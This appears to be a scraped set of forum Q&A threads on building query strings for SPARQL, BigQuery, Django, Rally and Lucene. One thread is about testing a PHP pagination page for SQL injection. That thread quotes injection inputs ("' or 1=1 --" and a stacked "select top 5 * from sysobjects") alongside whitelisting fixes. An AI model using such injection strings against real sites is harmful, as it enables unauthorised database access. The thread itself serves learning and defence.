Encoding/providing string & integer values in sqarql GET requests - sparql

I have a sparql query with a FILTER statement as follows:
FILTER ((?dayOfWeek = ?day) && (?start >= ?startTime) && (?finish <= ?finishTime))
I know that this query runs correctly if I replace with literal values and execute on snorql:
FILTER ((?dayOfWeek = "Wed") && (?start >= 720) && (?finish <= 820))
I want to provide the values via a GET request instead, so something like:
...sparql?query=<query>&day=Wed&startTime=720&finishTime=820
However, the above request doesn't work (it returns an empty data set). I've tried specifying the types of startTime and finishTime, ie
...sparql?query=<query>&day=Wed&startTime=720&startTime_type=integer&finishTime=820&finishTime_type=integer
but this doesn't fix the issue.
Providing the literal values that work on snorql in the query string also results in an empty dataset, which is really puzzling me.
I assume that I must either be providing the values in the wrong way, or encoding them incorrectly. The query string itself has been percent escaped (character set: !*'();:#&=+$,/?%#[]).
Any suggestions?

If you are using the SPARQL protocol, the usage is
...sparql?query=PREFIX .. SELECT...
i.e. a complete SPARQL query (encoded for being in a URL).

Related

How can you run a query in BigQuery to match logs where the callerIP is not within a certain list of IP ranges?

I am trying to run the following query in BigQuery - I am confident that the rest of the query is correct however the only issue is how I have listed the IP addresses in the line below. I am being presented with the error message "Encountered " <FLOATING_LITERAL> "x.y "" at line 17, column 62" ( where x and y are integers)
  AND NOT (protopayload_auditlog.requestMetadata.callerIp : "IP-RANGE IP-RANGE IP-RANGE IP-RANGE")
Where IP-RANGE is of course of the form x.y.z.f-x.y.z.e
I am not sure how to format this string of IP addresses to make the query work. Would be really grateful for some assistance!
The below, is the full query;
#legacySQL
SELECT
  protopayload_auditlog.authenticationInfo.principalEmail AS principalEmail,
  resource.labels.project_id AS project_id,
  resource.labels.bucket_name AS bucket_name,
  resource.labels.method AS method,
  protopayload_auditlog.requestMetadata.callerIp AS callerIp,
  timestamp AS timestamp
FROM (TABLE_DATE_RANGE([projectid.organisation_audit_logging.cloudaudit_googleapis_com_data_access_],
      DATE_ADD(CURRENT_TIMESTAMP(), -40, 'DAY'),
      DATE_ADD(CURRENT_TIMESTAMP(), -38, 'DAY')))
WHERE
  protopayload_auditlog.serviceName = "storage.googleapis.com"
  AND resource.labels.method = 'google.storage.objects.get'
  AND REGEXP_MATCH(protopayload_auditlog.authenticationInfo.principalEmail, r"^.*#mycompany\.com")
  AND NOT (protopayload_auditlog.requestMetadata.callerIp : "IP-RANGE IP-RANGE IP-RANGE IP-RANGE")
LIMIT 500
you can employ below approach as a starting point - you can wrap up all lengthy stuff into into UDF to make it compact and readable
AND NOT net.ipv4_to_int64(net.safe_ip_from_string(protopayload_auditlog.requestMetadata.callerIp)) between net.ipv4_to_int64(net.safe_ip_from_string(ip_range1_start)) and net.ipv4_to_int64(net.safe_ip_from_string(ip_range1_end))
AND NOT net.ipv4_to_int64(net.safe_ip_from_string(protopayload_auditlog.requestMetadata.callerIp)) between net.ipv4_to_int64(net.safe_ip_from_string(ip_range2_start)) and net.ipv4_to_int64(net.safe_ip_from_string(ip_range2_end))
...

How to create a correct filter string with OR and AND operators for django?

My app has a frontend on vue.js and backend on django rest framework. I need to do a filter string on vue which should do something like this:
((status=closed) | (status=canceled)) & (priority=middle)
but got an error as a response
["Invalid querystring operator. Matched: ') & '."]
After encoding my string looks like this:
?filters=((status%3D%D0%97%D0%B0%D0%BA%D1%80%D1%8B%D1%82)%20%7C%20(status%3D%D0%9E%D1%82%D0%BA%D0%BB%D0%BE%D0%BD%D0%B5%D0%BD))%20%26%20(priority%3D%D0%A1%D1%80%D0%B5%D0%B4%D0%BD%D0%B8%D0%B9)
which corresponds to
?filters=((status=closed)|(status=canceled))&(priority=middle)
How should look a correct filter string for django?
I have no problem if statement includes only | or only &. For example filter string like this one works perfect:
?filters=(status%3D%D0%97%D0%B0%D0%BA%D1%80%D1%8B%D1%82)%20%7C%20(status%3D%D0%9E%D1%82%D0%BA%D0%BB%D0%BE%D0%BD%D0%B5%D0%BD)
a.k.a. ?filters=(status=closed)|(status=canceled). But if i add an & after it and additional brackets to specify the order of conditions calculation it fails with an error.
I also tried to reduce usage of brackets and had string like this (as experiment):
?filters=(status%3D%D0%97%D0%B0%D0%BA%D1%80%D1%8B%D1%82%20%7C%20status%3D%D0%9E%D1%82%D0%BA%D0%BB%D0%BE%D0%BD%D0%B5%D0%BD)
a.k.a. ?filters=(status=closed | status=canceled). This one doesn't work - get neither error nor the data.
I need to have a mixed results in my case: both statuses (closed and canceled) and priority=middle, but a string format isn't correct. Please explain, which format would be Ok?
That doesn't look like a very uri friendly syntax you're trying to use there.
Try doing this instead:
?status[]=closed&status[]=cancelled&priority=middle
Then use request.GET.getlist('status[]') to get back the list and use the values for logical OR queryset filtering:
qs = qs.filter(status__in=request.GET.getlist('status[]', [])
and then add any additional filtering which works as logical AND.
If you're using axios, it should automatically format js status url param into proper format.

Rally custom list query not working on string custom field

I have a custom field being added on user story (HierarchicalRequirement) level.
The WSAPI documentation shows the following details for the field:
c_CustomFieldName
Required false
Type string
Max Length 32,768
Sortable true
Explicit Fetch false
Query Expression Operators contains, !contains, =, !=
When trying to create a report using Custom List to identify user stories where this field is empty, I add (c_CustomFieldName = "") to the query.
And yet, the result shows rows where this field is not empty.
How can that be?
I tried querying on null, but it didn't work.
thx in advance
What you're doing should work- are you getting errors, or just incorrect data? It almost seems like it's ignoring your query altogether.
I tried to repro both with the custom list app and against wsapi directly and the following all worked as expected:
(c_CustomText = "") //empty
(c_CustomText = null) //empty
(c_CustomText != "") //non-empty
(c_CustomText != null) //non-empty
It's possible you're running into some weird data-specific edge case in your data. It may be worth following up with support.

SQL Injection: is this secure?

I have this site with the following parameters:
http://www.example.com.com/pagination.php?page=4&order=comment_time&sc=desc
I use the values of each of the parameters as a value in a SQL query.
I am trying to test my application and ultimately hack my own application for learning purposes.
I'm trying to inject this statement:
http://www.example.com.com/pagination.php?page=4&order=comment_time&sc=desc' or 1=1 --
But It fails, and MySQL says this:
Warning: mysql_fetch_assoc() expects parameter 1 to be resource,
boolean given in /home/dir/public_html/pagination.php on line 132
Is my application completely free from SQL injection, or is it still possible?
EDIT: Is it possible for me to find a valid sql injection statement to input into one of the parameters of the URL?
The application secured from sql injection never produces invalid queries.
So obviously you still have some issues.
Well-written application for any input produces valid and expected output.
That's completely vulnerable, and the fact that you can cause a syntax error proves it.
There is no function to escape column names or order by directions. Those functions do not exist because it is bad style to expose the DB logic directly in the URL, because it makes the URLs dependent on changes to your database logic.
I'd suggest something like an array mapping the "order" parameter values to column names:
$order_cols = array(
'time' => 'comment_time',
'popular' => 'comment_score',
... and so on ...
);
if (!isset($order_cols[$_GET['order'])) {
$_GET['order'] = 'time';
}
$order = $order_cols[$_GET['order']];
Restrict "sc" manually:
if ($_GET['sc'] == 'asc' || $_GET['sc'] == 'desc') {
$order .= ' ' . $_GET['sc'];
} else {
$order .= ' desc';
}
Then you're guaranteed safe to append that to the query, and the URL is not tied to the DB implementation.
I'm not 100% certain, but I'd say it still seems vulnerable to me -- the fact that it's accepting the single-quote (') as a delimiter and then generating an error off the subsequent injected code says to me that it's passing things it shouldn't on to MySQL.
Any data that could possibly be taken from somewhere other than your application itself should go through mysql_real_escape_string() first. This way the whole ' or 1=1 part gets passed as a value to MySQL... unless you're passing "sc" straight through for the sort order, such as
$sql = "SELECT * FROM foo WHERE page='{$_REQUEST['page']}' ORDER BY data {$_REQUEST['sc']}";
... which you also shouldn't be doing. Try something along these lines:
$page = mysql_real_escape_string($_REQUEST['page']);
if ($_REQUEST['sc'] == "desc")
$sortorder = "DESC";
else
$sortorder = "ASC";
$sql = "SELECT * FROM foo WHERE page='{$page}' ORDER BY data {$sortorder}";
I still couldn't say it's TOTALLY injection-proof, but it's definitely more robust.
I am assuming that your generated query does something like
select <some number of fields>
from <some table>
where sc=desc
order by comment_time
Now, if I were to attack the order by statement instead of the WHERE, I might be able to get some results... Imagine I added the following
comment_time; select top 5 * from sysobjects
the query being returned to your front end would be the top 5 rows from sysobjects, rather than the query you try to generated (depending a lot on the front end)...
It really depends on how PHP validates those arguments. If MySQL is giving you a warning, it means that a hacker already passes through your first line of defence, which is your PHP script.
Use if(!preg_match('/^regex_pattern$/', $your_input)) to filter all your inputs before passing them to MySQL.

lucene query issue

I am using Lucene with Alfresco. Here is my query:
( TYPE:"{com.company.customised.content.model}test" && (#\{com.company.customised.content.model\}testNo:111 && (#\{com.company.customised.content.model\}skill:or))
I have to search documents which are having property skill of value "or". The above query is not giving any results (I am getting failed to parse query).
If I use the query up until testNo (ignoring skill), I am getting proper results:
( TYPE:"{com.company.customised.content.model}test" && (#\{com.company.customised.content.model\}testNo:111))
Can you please help me?
Thanks
Unfortunately, "or" is a reserved keyword in Lucene. Therefore, Lucene fails to properly interpret your query, because Lucene thinks you are referring to the OR boolean operator. You may want to try wrapping the or in double quotes:
( TYPE:"{com.company.customised.content.model}test" && (#\{com.company.customised.content.model\}testNo:111 && (#\{com.company.customised.content.model\}skill:"or"))
I am not familiar with Alfresco, so you may not be able to do this.
Yes , or is reserved keyword in lucene but if you are trying to query by property which is of type number then you can give your value directly else if of type d:text or string so that you have to gave your value in double quote " " .
( TYPE:"{com.company.customised.content.model}test" && (#{com.company.customised.content.model}testNo:111 && (#{com.company.customised.content.model}skill:"or"))